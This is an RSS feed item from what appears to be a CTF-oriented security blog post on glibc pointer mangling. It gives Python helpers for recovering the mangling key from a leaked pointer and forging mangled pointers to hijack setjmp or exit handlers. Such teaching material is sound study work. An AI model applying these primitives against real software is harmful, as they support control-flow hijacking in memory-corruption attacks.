When the OS loads a binary, it stores two qwords of random data in the Thread Control Block (TCB). The first qword is used as a stack canary (&lt;code&gt;fs:0x28&lt;/code&gt;), and the second qword is used for pointer mangling. The &lt;code&gt;exit_funcs&lt;/code&gt; use the same mangling key as &lt;code&gt;setjmp&lt;/code&gt; (&lt;a href=&quot;https://blog.davidherm.es/posts/babyheap_2/#exploiting-with-exit_func-overwrite&quot;&gt;link&lt;/a&gt; to an old writeup).
:::&lt;/p&gt;
&lt;p&gt;This means that as long as we know both a mangled value and the real address it encodes (for example, through a leak of the return address), it is possible to recover the key this way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from pwnlib.util.fiddling import ror  # rotate-right helper from pwntools

def recover_key(mangled_addr:int, real_addr:int):
	return ror(mangled_addr, 0x11, 64) ^ real_addr
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After that, we can mangle an arbitrary pointer by doing the reverse of the demangling operation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from pwnlib.util.fiddling import rol  # rotate-left helper from pwntools

def mangle_addr(real_addr:int, key:int):
	return rol(real_addr ^ key, 0x11, 64)
&lt;/code&gt;&lt;/pre&gt;
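&lt;p&gt;For readers without pwntools at hand, the same logic can be sketched with the standard library only, together with a round-trip check. The rotations are written with plain arithmetic, and the key and pointer in the usage note are made-up values rather than real leaks.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;BITS = 64
MOD = 2 ** BITS

def rol(value, count):
    # Multiplying by 2**count shifts left; floor division brings the top bits back around
    value %= MOD
    return (value * 2 ** count) % MOD | value // 2 ** (BITS - count)

def ror(value, count):
    # Rotating right by count equals rotating left by BITS - count
    return rol(value, BITS - count)

def mangle(ptr, key):
    # XOR with the key first, then rotate left by 17 bits
    return rol(ptr ^ key, 0x11)

def demangle(mangled, key):
    # What __longjmp does: rotate right by 17 bits, then XOR with the key
    return ror(mangled, 0x11) ^ key

def recover_key(mangled, ptr):
    # Same rotation, but XOR with the known pointer to isolate the key
    return ror(mangled, 0x11) ^ ptr
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With a key of &lt;code&gt;0x1122334455667788&lt;/code&gt; and a pointer of &lt;code&gt;0x7fc4ede2a1ca&lt;/code&gt;, demangling the mangled pointer returns the pointer and &lt;code&gt;recover_key&lt;/code&gt; returns the key, which confirms that the two operations are inverses of each other.&lt;/p&gt;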
&lt;h2&gt;CTF challenges&lt;/h2&gt;
&lt;p&gt;If you want to try this technique, I will add a list of challenges below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;txvm (Teamitaly 2026 Quals): waiting for release&lt;/li&gt;
&lt;/ul&gt;
</content:encoded><author>David Hermes</author></item></channel></rss>